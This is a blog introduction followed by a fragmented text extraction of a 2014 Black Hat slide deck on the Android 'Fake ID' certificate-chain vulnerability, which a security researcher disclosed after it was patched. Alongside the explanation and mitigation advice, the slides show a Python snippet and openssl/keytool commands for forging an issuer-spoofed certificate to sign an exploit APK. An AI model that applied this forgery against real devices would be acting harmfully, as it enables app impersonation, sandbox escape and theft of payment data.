Every Android application has its own unique identity, typically inherited from the corporate developer’s identity. In July 2014, the Bluebox Security research team, Bluebox Labs, released the details of a new vulnerability discovered in Android, which allows these identities to be copied and used for nefarious purposes.
Dubbed “Fake ID,” the vulnerability allows malicious applications to impersonate specially recognized trusted applications without any user notification. This can result in a wide spectrum of consequences. For example, the vulnerability can be used by malware to escape the normal application sandbox and take one or more malicious actions: insert a Trojan horse into an application by impersonating Adobe Systems; gain access to NFC financial and payment data by impersonating Google Wallet; or take full management control of the entire device by impersonating 3LM.
This year at Black Hat USA, Jeff Forristal, CTO of Bluebox, presented on Fake ID. His presentation explains the technical details of how the vulnerability works.
Watch a demo of the vulnerability here:
http://offers.bluebox.com/resource-video-fakeID-recording.html?aliId=903578
2. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Jeff Forristal, CTO of Bluebox Security
Discovered Android Masterkey vulnerability in 2013
Contributing to the security industry for 15+ years
Masterkey
3. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
bug# 13678484
Security sandbox escape
Usable by malware
Allows data theft, device control
All by presenting a fake signature identification
A.k.a. the “Fake ID” vulnerability
4. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Application
Identities /
Signatures
Jeff Forristal / Bluebox
5. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Android applications are signed
The signature is the base of multiple security features
Signatures
7. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
MySelf
-‐-‐
BEGIN
PUBLIC
KEY
-‐-‐-‐
…
Issuer:
MySelf
Issuer
Signature:
… crypto …
-‐-‐
BEGIN
PRIVATE
KEY
-‐-‐-‐
…
Subject:
www.bluebox.com
-‐-‐
BEGIN
PUBLIC
KEY
-‐-‐-‐
…
Issuer:
Verisign
CA
Issuer
Signature:
Certificates 101
… crypto …
-‐-‐
BEGIN
PRIVATE
KEY
-‐-‐-‐
…
Subject:
Verisign
CA
-‐-‐
BEGIN
PUBLIC
KEY
-‐-‐-‐
…
Issuer:
…
Issuer
Signature:
…
-‐-‐
BEGIN
PRIVATE
KEY
-‐-‐-‐
…
8. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
client
Public
Key
Issuer:
SubCA1
Issuer
Signature
Public
Key
Issuer:
SubCA2
Certificate Chaining
Subject:
SubCA1
Issuer
Signature
Subject:
SubCA2
Public
Key
Issuer:
CA
Issuer
Signature
Subject:
CA
Public
Key
Issuer:
CA
Issuer
Signature
Immediate identity / signer
Trusted root certificate
Private
Key
9. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
client
Public
Key
Issuer:
SubCA1
Issuer
Signature
Subject:
SubCA1
Public
Key
Issuer:
CA
Issuer
Signature
Subject:
CA
Public
Key
Issuer:
CA
Issuer
Signature
Android On A Normal Day
Subject:
client
Public
Key
Issuer:
SubCA1
Issuer
Signature
Subject:
SubCA1
Public
Key
Issuer:
CA
Issuer
Signature
Subject:
CA
Public
Key
Issuer:
CA
Issuer
Signature
10. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Vulnerability
Mechanics
Jeff Forristal / Bluebox
11. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Applications attempt to verify the signing
of other applications
PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES )
Signatures[] signatures = pkgInfo.signatures;
for (Signature sig : signatures ) {
if ( sig.equals( TRUSTED_SIGNATURE ) ) {
// trusted signature found, trust the application
}
}
Trust Checking
12. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
client
Public
Key
Issuer:
SubCA1
Issuer
Signature
PKI Chaining
Subject:
SubCA1
Public
Key
Issuer:
SubCA2
Issuer
Signature
Subject:
SubCA2
Public
Key
Issuer:
CA
Issuer
Signature
Subject:
CA
Public
Key
Issuer:
CA
Issuer
Signature
Trust?
Trust?
Trust?
13. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
The logic accepts one trusted
certificate anywhere in
signature /certificate chain
Theory
17. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Chain Construction
1. Verify signature with signer cert
2. Create a chain based on valid
signer cert
3. Get the cert’s issuer
4. Find an included cert where
included cert subject == previous
cert’s issuer
5. Add that cert to the chain
18. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
client
Public
Key
Issuer:
SubCA1
Issuer
Signature
Oops
Subject:
SubCA1
Public
Key
Issuer:
SubCA2
Issuer
Signature
Subject:
SubCA2
Public
Key
Issuer:
CA
Issuer
Signature
Subject:
CA
Public
Key
Issuer:
CA
Issuer
Signature
?
?
?
A certificate can claim to be issued by
any other certificate …
… and that claim is
not verified
19. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
This code can now be easily attacked / bypassed
PackageInfo pkgInfo = pkgmgr.getPackageInfo( pkg, GET_SIGNATURES )
Signatures[] signatures = pkgInfo.signatures;
for (Signature sig : signatures ) {
if ( sig.equals( TRUSTED_SIGNATURE ) ) {
// trusted signature found, trust the application
}
}
Impact
20. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
AWacker
Public
Key
Issuer:
AWacker
Issuer
Signature
Fabrication
Subject:
TrustedCert
Public
Key
Issuer:
…
Issuer
Signature
Private
Key
No private key!
Public cert only!
21. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
AWacker
Public
Key
Issuer:
TrustedCert
Issuer
Signature
Fabrication
Subject:
TrustedCert
Public
Key
Issuer:
…
Issuer
Signature
Private
Key
22. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
AWacker
Public
Key
Issuer:
TrustedCert
Issuer
Signature
Result
Subject:
TrustedCert
Public
Key
Issuer:
…
Issuer
Signature
Trust?
Trust?
23. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Exploitation
Jeff Forristal / Bluebox
24. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Review all uses of
signatures in AOSP
Targets
Further review
of select third-party
components involving
extra privileges
25. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Webview plugin manager (all AOSP <= 4.3)
• Plugins signed by Adobe (Flash) reloaded into any/all apps using
framework webview
NFC access.xml (all AOSP)
• Match a package signature wildcard (Google Wallet), get access to
NFC secure element
3LM device management extensions (assorted devices)
• Former Google/Motorola technology, included with older devices
There will be others identities/vectors…
• It’s a general purpose problem
Targets - Examples
26. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Subject:
trusted_cert
Public
Key
Issuer:
…
Issuer
Signature
1. Create APK with exploit
payload suitable for target
2. Isolate trusted certificate
3. Generate a new certificate
4. Set issuer to trusted certificate
5. Package all of it (new cert +
target cert as a CA cert) into a
PKCS12 file
6. Use the PKCS12 for exploit
APK signing
Subject:
AWacker
Issuer:
trusted_cert
Issuer
Signature
(broken)
Public
Key
targetcert = OpenSSL.crypto.load_certificate( target )
pk = OpenSSL.crypto.PKey()
pk.generate_key( OpenSSL.crypto.TYPE_RSA, 1024)
newcert = OpenSSL.crypto.X509()
newcert.get_subject().CN = “arbitrary”
newcert.set_issuer( targetcert.get_subject() )
newcert.set_pubkey( pk )
newcert.sign( pk, “sha1” )
pkcs12 = OpenSSL.crypto.PKCS12()
pkcs12.set_privatekey( pk )
pkcs12.set_certificate( cert )
pkcs12.set_ca_certificates( [targetcert] )
finalPkcs12Data = pkcs12.export( passphrase=“1234” )
Exploit Creation
27. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
jeff$
openssl
x509
-‐in
webkit_plugin.pem
-‐noout
-‐text
|
grep
Subject:
Subject:
C=US,
ST=California,
L=San
Jose,
O=Adobe
Systems
Incorporated,
OU=…
jeff$
python
newcert.py
webkit_plugin.pem
jeff$
openssl
x509
-‐in
out.cert
-‐noout
-‐text
CerFficate:
Data:
Version:
1
(0x0)
Serial
Number:
976234562
(0x3a302842)
Signature
Algorithm:
sha1WithRSAEncrypFon
Issuer:
C=US,
ST=California,
L=San
Jose,
O=Adobe
Systems
Incorporated,
OU=…
Validity
Not
Before:
Jun
30
23:44:40
2014
GMT
Not
Aker
:
Jun
25
23:44:40
2034
GMT
Subject:
CN=labs.bluebox.com
Subject
Public
Key
Info:
Public
Key
Algorithm:
rsaEncrypFon
RSA
Public
Key:
(1024
bit)
Modulus
(1024
bit):
00:b4:df:2d:53:9a:f2:8f:61:99:bc:56:19:57:76:
…
Crafting
28. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
jeff$
keytool
-‐v
-‐importkeystore
-‐srckeystore
out.pkcs12
-‐srcstoretype
PKCS12
-‐destkeystore
evil.keystore
-‐deststoretype
JKS
Enter
desFnaFon
keystore
password:
Re-‐enter
new
password:
Enter
source
keystore
password:
Entry
for
alias
1
successfully
imported.
Import
command
completed:
1
entries
successfully
imported,
0
entries
failed
or
cancelled
[Storing
evil.keystore]
Crafting
34. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Battle Plan
Command
&
Control
Server
App
App
App
App
Evil
App
plugin.so
Evil
.so
.so
.so
.so
.so
35. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Mitigation
Jeff Forristal / Bluebox
36. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Patched, sent to OHA partners – get your OTAs
in the usual manner (if ever)
BTW, released to public repo May 21st
Patches
37. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Bluebox
Security
Scanner
(free)
Jeff Forristal / Bluebox
38. FORRISTAL – ANDROID FAKE ID BLACKHAT 20:14
Stick to known sources for your applications
Android 4.4 (KitKat) + is immune to Flash webkit plugin
(KitKat replaced webkit webview with chromium)
Check your (older) device for 3LM extensions
(adb shell getprop | grep ro.3lm.production)
Beware of who asks for Device Admin access
(Settings -> Security -> Device Administrators)
Hygiene